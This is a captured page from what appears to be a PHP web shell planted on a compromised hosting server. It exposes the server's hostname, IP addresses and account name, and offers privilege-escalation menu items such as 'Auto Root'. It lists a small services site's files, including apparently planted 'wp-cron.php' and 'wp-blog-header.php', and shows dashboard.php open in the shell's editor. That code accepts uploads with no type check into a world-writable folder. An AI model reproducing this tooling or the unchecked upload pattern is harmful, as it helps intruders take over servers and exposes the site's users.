Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data sycho /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
auth
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
layouts
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
uploads
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
404.php
2.81
KB
-rw-r--r--
2026-03-01 20:29
PRD.md
10.42
KB
-rw-r--r--
2026-03-01 20:12
contact.php
8.52
KB
-rw-r--r--
2026-03-01 23:42
dashboard.php
27.37
KB
-rw-r--r--
2026-03-01 20:23
database.sql
3.35
KB
-rw-r--r--
2026-03-01 20:13
error_log
6.87
KB
-rw-r--r--
2026-03-01 20:23
index.php
11.9
KB
-rw-r--r--
2026-03-16 18:50
me.zip
14.2
MB
-rw-r--r--
2026-03-01 20:08
payment.php
9.09
KB
-rw-r--r--
2026-03-01 23:13
process_order.php
2.36
KB
-rw-r--r--
2026-03-01 21:23
purchase.php
6.51
KB
-rw-r--r--
2026-03-01 23:14
services.php
5.29
KB
-rw-r--r--
2026-03-01 23:40
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php session_start(); include 'includes/db.php'; // Check if logged in if (!isset($_SESSION['user_id'])) { header('Location: auth/login.php'); exit; } $user_id = $_SESSION['user_id']; $success_msg = ""; $error_msg = ""; // Handle Profile Update if (isset($_POST['update_profile'])) { $name = $_POST['name']; $email = $_POST['email']; $new_password = $_POST['password']; try { if (!empty($new_password)) { $hashed_password = password_hash($new_password, PASSWORD_DEFAULT); $stmt = $pdo->prepare("UPDATE users SET name = ?, email = ?, password = ? WHERE id = ?"); $stmt->execute([$name, $email, $hashed_password, $user_id]); } else { $stmt = $pdo->prepare("UPDATE users SET name = ?, email = ? WHERE id = ?"); $stmt->execute([$name, $email, $user_id]); } $success_msg = "Command Executed: Profile updated successfully."; } catch (Exception $e) { $error_msg = "Operation Failed: " . $e->getMessage(); } } // Handle Payment Submission if (isset($_POST['submit_payment_notification'])) { $order_id = $_POST['order_id']; // Screenshot Upload handling $screenshot_path = null; if (isset($_FILES['payment_screenshot']) && $_FILES['payment_screenshot']['error'] == 0) { $upload_dir = 'uploads/payments/'; if (!is_dir($upload_dir)) mkdir($upload_dir, 0777, true); $filename = "PAY_PROOF_" . $order_id . "_" . time() . "_" . basename($_FILES['payment_screenshot']['name']); $target_file = $upload_dir . $filename; if (move_uploaded_file($_FILES['payment_screenshot']['tmp_name'], $target_file)) { $screenshot_path = $filename; } } if ($screenshot_path) { $stmt = $pdo->prepare("UPDATE orders SET payment_status = 'Pending Approval', payment_screenshot = ? WHERE id = ? AND user_id = ?"); $stmt->execute([$screenshot_path, $order_id, $user_id]); $success_msg = "Payment request submitted. Proof has been uploaded for administrative verification."; } else { $error_msg = "Payment submission failed. Proof of payment is required."; } } // Fetch User Data $stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?"); $stmt->execute([$user_id]); $user = $stmt->fetch(); if (!$user) { header('Location: auth/logout.php'); exit; } // Fetch Admin Payment Methods try { $payment_methods = $pdo->query("SELECT * FROM admin_payment_methods")->fetchAll(); } catch (Exception $e) { $payment_methods = []; // Table may not exist on live server yet } // Current Tab $tab = $_GET['tab'] ?? 'overview'; // Fetch Orders $stmt = $pdo->prepare(" SELECT o.*, s.name as service_name, s.price as service_price FROM orders o JOIN services s ON o.service_id = s.id WHERE o.user_id = ? ORDER BY o.ordered_at DESC "); $stmt->execute([$user_id]); $db_orders = $stmt->fetchAll(); $orders = []; foreach ($db_orders as $row) { $labels = [ 1 => 'Order Placed', 2 => 'Requirements Analysis', 3 => 'Design Phase', 4 => 'Core Development', 5 => 'Quality Assurance', 6 => 'Beta Testing', 7 => 'Final Refinements', 8 => 'Order Complete' ]; $orders[] = [ 'id' => $row['id'], 'order_no' => '#CS-' . str_pad($row['id'], 4, '0', STR_PAD_LEFT), 'service' => $row['service_name'], 'price' => $row['service_price'], 'status_id' => $row['order_status'], 'status_label' => $labels[$row['order_status']] ?? 'Pending', 'ordered_at' => $row['ordered_at'], 'payment_status' => $row['payment_status'] ?: 'Unpaid', 'is_complete' => ($row['order_status'] == 8), 'file_url' => $row['deliverable_file'] ? 'uploads/deliverables/' . $row['deliverable_file'] : '#' ]; } include 'layouts/header.php'; ?> <main style="padding-top: 100px; padding-bottom: 80px; background: #fafafa; min-height: 100vh;"> <!-- Sidebar Overlay --> <div class="sidebar-overlay" id="sidebarOverlay" onclick="toggleSidebar()"></div> <div class="container"> <div class="dashboard-grid"> <!-- Sidebar Navigation --> <aside class="sidebar admin-card" id="dashboardSidebar"> <!-- Close button for mobile --> <div class="mobile-only" style="text-align: right; margin-bottom: 2rem;"> <button onclick="toggleSidebar()" style="background: #f8fafc; border: none; width: 40px; height: 40px; border-radius: 12px; font-size: 1.1rem; color: #64748b;"><i class="fas fa-times"></i></button> </div> <div style="text-align: center; margin-bottom: 4rem;"> <div style="width: 90px; height: 90px; background: var(--primary); border: 4px solid #fff; border-radius: 30px; margin: 0 auto 1.5rem auto; display: flex; align-items: center; justify-content: center; font-size: 2.2rem; color: #fff; font-weight: 800; box-shadow: 0 15px 35px var(--primary-glow); transform: rotate(-5deg);"> <?php echo strtoupper($user['name'][0]); ?> </div> <h3 style="margin-bottom: 0.2rem; font-weight: 800; font-size: 1.3rem; color: var(--text-main);"><?php echo htmlspecialchars($user['name']); ?></h3> <div style="background: var(--primary-light); padding: 0.4rem 1rem; border-radius: 10px; display: inline-block; margin-top: 0.5rem;"> <span style="color: var(--primary); font-size: 0.75rem; font-weight: 800; text-transform: uppercase; letter-spacing: 1px;">Partner Tier</span> </div> </div> <div style="text-align: left; flex-grow: 1;"> <p style="font-size: 0.65rem; font-weight: 800; color: #94a3b8; text-transform: uppercase; letter-spacing: 2px; margin-bottom: 1.5rem; padding-left: 1rem;">Main Console</p> <a href="?tab=overview" style="display: flex; align-items: center; gap: 1.2rem; margin-bottom: 0.8rem; padding: 1.1rem 1.5rem; border-radius: 15px; color: <?php echo $tab == 'overview' ? 'var(--primary)' : 'var(--text-dim)'; ?>; background: <?php echo $tab == 'overview' ? 'var(--primary-light)' : 'transparent'; ?>; font-weight: 700; text-decoration: none; transition: all 0.3s ease;"> <i class="fas fa-th-large" style="font-size: 1.1rem;"></i> <span>Command Center</span> </a> <a href="?tab=orders" style="display: flex; align-items: center; gap: 1.2rem; margin-bottom: 0.8rem; padding: 1.1rem 1.5rem; border-radius: 15px; color: <?php echo $tab == 'orders' ? 'var(--primary)' : 'var(--text-dim)'; ?>; background: <?php echo $tab == 'orders' ? 'var(--primary-light)' : 'transparent'; ?>; font-weight: 700; text-decoration: none; transition: all 0.3s ease;"> <i class="fas fa-shopping-bag" style="font-size: 1.1rem;"></i> <span>Digital Assets</span> </a> <a href="?tab=profile" style="display: flex; align-items: center; gap: 1.2rem; margin-bottom: 0.8rem; padding: 1.1rem 1.5rem; border-radius: 15px; color: <?php echo $tab == 'profile' ? 'var(--primary)' : 'var(--text-dim)'; ?>; background: <?php echo $tab == 'profile' ? 'var(--primary-light)' : 'transparent'; ?>; font-weight: 700; text-decoration: none; transition: all 0.3s ease;"> <i class="fas fa-user-edit" style="font-size: 1.1rem;"></i> <span>Global Settings</span> </a> </div> <div style="border-top: 1px solid #f1f5f9; padding-top: 2rem; margin-top: auto;"> <a href="auth/logout.php" style="display: flex; align-items: center; gap: 1.2rem; color: #ef4444; font-weight: 800; text-decoration: none; padding: 1.1rem 1.5rem; border-radius: 15px; background: #fff1f2;"> <i class="fas fa-power-off"></i> <span>Terminate Session</span> </a> </div> </aside> <script> function toggleSidebar() { document.getElementById('dashboardSidebar').classList.toggle('active'); document.getElementById('sidebarOverlay').classList.toggle('active'); } </script> <!-- Content Area --> <section class="main-content"> <?php if ($success_msg): ?> <div style="background: #dcfce7; color: #166534; padding: 1.2rem; border-radius: 12px; margin-bottom: 3rem; font-weight: 700; font-size: 0.9rem;"> <i class="fas fa-check-circle" style="margin-right: 0.8rem;"></i> <?php echo $success_msg; ?> </div> <?php endif; ?> <?php if ($error_msg): ?> <div style="background: #fee2e2; color: #991b1b; padding: 1.2rem; border-radius: 12px; margin-bottom: 3rem; font-weight: 700; font-size: 0.9rem;"> <i class="fas fa-exclamation-circle" style="margin-right: 0.8rem;"></i> <?php echo $error_msg; ?> </div> <?php endif; ?> <?php if ($tab == 'overview'): ?> <div style="margin-bottom: 3rem;"> <div class="mobile-only" style="margin-bottom: 3rem;"> <button onclick="toggleSidebar()" style="background: #ffffff; color: var(--primary); border: 1px solid var(--primary-light); padding: 1rem 1.5rem; border-radius: 20px; font-weight: 800; font-size: 0.9rem; width: 100%; display: flex; align-items: center; justify-content: center; gap: 1rem; box-shadow: 0 10px 25px rgba(34, 197, 94, 0.12);"> <i class="fas fa-th-large" style="font-size: 1.1rem;"></i> Dashboard Configuration </button> </div> <p style="font-size: 0.75rem; font-weight: 800; color: var(--primary); text-transform: uppercase; letter-spacing: 2px; margin-bottom: 0.5rem;">Corporate Dashboard</p> <h1 style="font-size: 2rem; font-weight: 800; margin-bottom: 0.8rem; color: var(--text-main); letter-spacing: -1px;">Enterprise Overview</h1> <p style="color: var(--text-dim); font-size: 1rem; font-weight: 500;">Strategic summary of your ongoing digital roadmap.</p> </div> <?php if (empty($orders)): ?> <div style="background: #fdfdfd; padding: 5rem; border-radius: 40px; border: 1px dashed #cbd5e1; text-align: center;"> <i class="fas fa-rocket" style="font-size: 3rem; color: var(--primary); margin-bottom: 2rem; opacity: 0.2;"></i> <h3 style="margin-bottom: 1rem; font-weight: 800;">No active projects detected.</h3> <p style="color: var(--text-dim); margin-bottom: 2.5rem;">Ready to build something extraordinary?</p> <a href="services.php" class="btn-primary">Browse Solutions</a> </div> <?php else: ?> <?php foreach (array_slice($orders, 0, 3) as $order): ?> <div class="card admin-card" style="margin-bottom: 1.5rem; position: relative; overflow: hidden;"> <?php if ($order['is_complete']): ?> <div style="position: absolute; top: 0; right: 0; background: var(--primary); color: #fff; padding: 0.6rem 1.5rem; font-weight: 800; border-bottom-left-radius: 15px; font-size: 0.65rem; text-transform: uppercase; letter-spacing: 1px;">DELIVERED</div> <?php endif; ?> <div style="display: flex; justify-content: space-between; align-items: start; margin-bottom: 2rem; flex-wrap: wrap; gap: 1rem;"> <div> <h3 style="font-size: 1.3rem; font-weight: 800; margin-bottom: 0.4rem;"><?php echo htmlspecialchars($order['service']); ?></h3> <p style="color: #64748b; font-size: 0.85rem; font-weight: 600;">ID: <span style="color: var(--primary); font-weight: 800;"><?php echo $order['order_no']; ?></span> | <?php echo date('M d, Y', strtotime($order['ordered_at'])); ?></p> </div> <div style="display: flex; align-items: center; gap: 0.8rem;"> <?php if ($order['is_complete']): ?> <a href="<?php echo $order['file_url']; ?>" class="btn-primary" style="padding: 0.7rem 1.2rem; border-radius: 10px; font-size: 0.85rem;"><i class="fas fa-file-download"></i> Deliverables</a> <?php elseif ($order['payment_status'] == 'Unpaid'): ?> <a href="payment.php?order_id=<?php echo $order['id']; ?>" class="btn-primary" style="background: #ef4444; border:none; padding: 0.7rem 1.2rem; border-radius: 10px; font-size: 0.85rem;"><i class="fas fa-wallet"></i> Pay Now</a> <?php elseif ($order['payment_status'] == 'Pending Approval'): ?> <span style="background: #fef9c3; color: #854d0e; padding: 0.5rem 1rem; border-radius: 10px; font-size: 0.75rem; font-weight: 800;"><i class="fas fa-hourglass-half"></i> Awaiting Verification</span> <?php endif; ?> </div> </div> <div style="margin-top: 1.5rem;"> <div style="display: flex; justify-content: space-between; margin-bottom: 0.8rem; align-items: flex-end;"> <div> <span style="display: block; font-size: 0.7rem; font-weight: 800; color: #94a3b8; text-transform: uppercase; margin-bottom: 0.3rem;">Milestone</span> <span style="font-weight: 800; font-size: 1.1rem; color: var(--primary);"><?php echo $order['status_label']; ?></span> </div> <span style="font-weight: 800; color: var(--text-main); font-size: 0.95rem;"><?php echo round(($order['status_id'] / 8) * 100); ?>%</span> </div> <div style="width: 100%; height: 10px; background: #f1f5f9; border-radius: 10px; position: relative; overflow: hidden;"> <div style="width: <?php echo($order['status_id'] / 8) * 100; ?>%; height: 100%; background: var(--primary); border-radius: 10px;"></div> </div> </div> </div> <?php endforeach; ?> <?php endif; ?> <?php elseif ($tab == 'orders'): ?> <div style="margin-bottom: 3rem;"> <div class="mobile-only" style="margin-bottom: 3rem;"> <button onclick="toggleSidebar()" style="background: #ffffff; color: var(--primary); border: 1px solid var(--primary-light); padding: 1rem 1.5rem; border-radius: 20px; font-weight: 800; font-size: 0.9rem; width: 100%; display: flex; align-items: center; justify-content: center; gap: 1rem; box-shadow: 0 10px 25px rgba(34, 197, 94, 0.12);"> <i class="fas fa-th-large" style="font-size: 1.1rem;"></i> Dashboard Configuration </button> </div> <p style="font-size: 0.75rem; font-weight: 800; color: var(--primary); text-transform: uppercase; letter-spacing: 2px; margin-bottom: 0.5rem;">Deployment Logs</p> <h1 style="font-size: 2rem; font-weight: 800; margin-bottom: 0.8rem; color: var(--text-main); letter-spacing: -1px;">Project History</h1> <p style="color: var(--text-dim); font-size: 1rem; font-weight: 500;">Complete historical archive of your development operations.</p> </div> <div class="card admin-card"> <!-- Desktop View --> <table class="desktop-only-table" style="width: 100%; border-collapse: collapse;"> <thead> <tr style="text-align: left;"> <th style="padding: 1.2rem 0; color: #64748b; font-size: 0.75rem; text-transform: uppercase; font-weight: 800;">Order ID</th> <th style="padding: 1.2rem; color: #64748b; font-size: 0.75rem; text-transform: uppercase; font-weight: 800;">Service</th> <th style="padding: 1.2rem; color: #64748b; font-size: 0.75rem; text-transform: uppercase; font-weight: 800;">State</th> <th style="padding: 1.2rem; color: #64748b; font-size: 0.75rem; text-transform: uppercase; font-weight: 800;">Settlement</th> <th style="padding: 1.2rem 0; color: #64748b; font-size: 0.75rem; text-transform: uppercase; font-weight: 800;">Asset</th> </tr> </thead> <tbody> <?php foreach ($orders as $order): ?> <tr style="border-bottom: 1px solid #f1f5f9;"> <td style="padding: 1.5rem 0; font-weight: 800; color: var(--primary);"><?php echo $order['order_no']; ?></td> <td style="padding: 1.5rem; font-weight: 700; color: var(--text-main);"><?php echo htmlspecialchars($order['service']); ?></td> <td style="padding: 1.5rem;"> <span style="background: var(--primary-light); color: var(--primary); padding: 0.4rem 0.8rem; border-radius: 10px; font-size: 0.7rem; font-weight: 800;"> <?php echo $order['status_label']; ?> </span> </td> <td style="padding: 1.5rem;"> <?php if ($order['payment_status'] == 'Paid'): ?> <span style="color: #166534; font-weight: 800; font-size: 0.85rem;"><i class="fas fa-check-circle"></i> VERIFIED</span> <?php elseif ($order['payment_status'] == 'Pending Approval'): ?> <span style="color: #854d0e; font-weight: 800; font-size: 0.85rem;"><i class="fas fa-clock"></i> PENDING</span> <?php else: ?> <a href="payment.php?order_id=<?php echo $order['id']; ?>" style="color:#ef4444; font-weight:800; font-size: 0.85rem; text-decoration: none;"><i class="fas fa-wallet"></i> PAY NOW</a> <?php endif; ?> </td> <td style="padding: 1.5rem 0;"> <?php if ($order['is_complete']): ?> <a href="<?php echo $order['file_url']; ?>" style="color: var(--primary); font-size: 1.1rem;"><i class="fas fa-cloud-download-alt"></i></a> <?php else: ?> <i class="fas fa-spinner fa-spin" style="color: #cbd5e1;"></i> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <!-- Mobile List View --> <div class="mobile-only-list"> <?php foreach ($orders as $order): ?> <div style="background: #f8fafc; border: 1px solid #f1f5f9; border-radius: 18px; padding: 1.2rem; margin-bottom: 1rem;"> <div style="display: flex; justify-content: space-between; align-items: start; margin-bottom: 0.8rem;"> <span style="color: var(--primary); font-weight: 800; font-size: 0.8rem;"><?php echo $order['order_no']; ?></span> <?php if ($order['payment_status'] == 'Paid'): ?> <span style="background: #dcfce7; color: #166534; padding: 0.3rem 0.6rem; border-radius: 6px; font-size: 0.65rem; font-weight: 800;">VERIFIED</span> <?php elseif ($order['payment_status'] == 'Pending Approval'): ?> <span style="background: #fef9c3; color: #854d0e; padding: 0.3rem 0.6rem; border-radius: 6px; font-size: 0.65rem; font-weight: 800;">PENDING</span> <?php else: ?> <span style="background: #fee2e2; color: #ef4444; padding: 0.3rem 0.6rem; border-radius: 6px; font-size: 0.65rem; font-weight: 800;">UNPAID</span> <?php endif; ?> </div> <h4 style="margin: 0 0 0.8rem 0; font-weight: 800; color: var(--text-main); font-size: 1rem;"><?php echo htmlspecialchars($order['service']); ?></h4> <div style="display: flex; justify-content: space-between; align-items: center; border-top: 1px solid #f1f5f9; padding-top: 0.8rem; margin-top: 0.8rem;"> <span style="font-weight: 700; font-size: 0.8rem; color: #64748b;"><?php echo $order['status_label']; ?></span> <?php if ($order['is_complete']): ?> <a href="<?php echo $order['file_url']; ?>" style="color: var(--primary); font-weight: 800; font-size: 0.9rem; text-decoration: none;"><i class="fas fa-download"></i> Get File</a> <?php elseif ($order['payment_status'] == 'Unpaid'): ?> <a href="payment.php?order_id=<?php echo $order['id']; ?>" style="color: #ef4444; font-weight: 800; font-size: 0.85rem; text-decoration: none;">Pay Now</a> <?php endif; ?> </div> </div> <?php endforeach; ?> </div> </div> <?php elseif ($tab == 'profile'): ?> <div style="margin-bottom: 3rem;"> <div class="mobile-only" style="margin-bottom: 3rem;"> <button onclick="toggleSidebar()" style="background: #ffffff; color: var(--primary); border: 1px solid var(--primary-light); padding: 1rem 1.5rem; border-radius: 20px; font-weight: 800; font-size: 0.9rem; width: 100%; display: flex; align-items: center; justify-content: center; gap: 1rem; box-shadow: 0 10px 25px rgba(34, 197, 94, 0.12);"> <i class="fas fa-th-large" style="font-size: 1.1rem;"></i> Dashboard Configuration </button> </div> <p style="font-size: 0.75rem; font-weight: 800; color: var(--primary); text-transform: uppercase; letter-spacing: 2px; margin-bottom: 0.5rem;">Configuration Hub</p> <h1 style="font-size: 2rem; font-weight: 800; margin-bottom: 0.8rem; color: var(--text-main); letter-spacing: -1px;">Identity Settings</h1> <p style="color: var(--text-dim); font-size: 1rem; font-weight: 500;">Manage your primary operational data and security keys.</p> </div> <div class="card admin-card" style="max-width: 700px;"> <form action="" method="POST"> <div class="form-group" style="margin-bottom: 2rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.75rem; color: #475569; font-weight: 800; text-transform: uppercase; letter-spacing: 1px;">Full Operational Name</label> <input type="text" name="name" value="<?php echo htmlspecialchars($user['name']); ?>" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600;"> </div> <div class="form-group" style="margin-bottom: 2rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.75rem; color: #475569; font-weight: 800; text-transform: uppercase; letter-spacing: 1px;">Email Connectivity</label> <input type="email" name="email" value="<?php echo htmlspecialchars($user['email']); ?>" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600;"> </div> <div class="form-group" style="margin-bottom: 2.5rem;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.75rem; color: #475569; font-weight: 800; text-transform: uppercase; letter-spacing: 1px;">New Security Phrase</label> <input type="password" name="password" placeholder="••••••••" style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; font-weight: 600;"> <p style="margin-top: 0.5rem; font-size: 0.7rem; color: #94a3b8; font-weight: 600;">Leave blank to preserve current security key.</p> </div> <button type="submit" name="update_profile" class="btn-primary" style="padding: 1.1rem 3rem; border-radius: 15px; font-size: 1rem; font-weight: 800; width: 100%;">Update Global Identity</button> </form> </div> <?php endif; ?> </section> </div> </div> </main> <style> input:focus { border-color: var(--primary) !important; background: #fff !important; box-shadow: 0 0 0 5px rgba(34, 197, 94, 0.05); } table tr:hover { background: #fafafa; } </style> <?php include 'layouts/footer.php'; ?>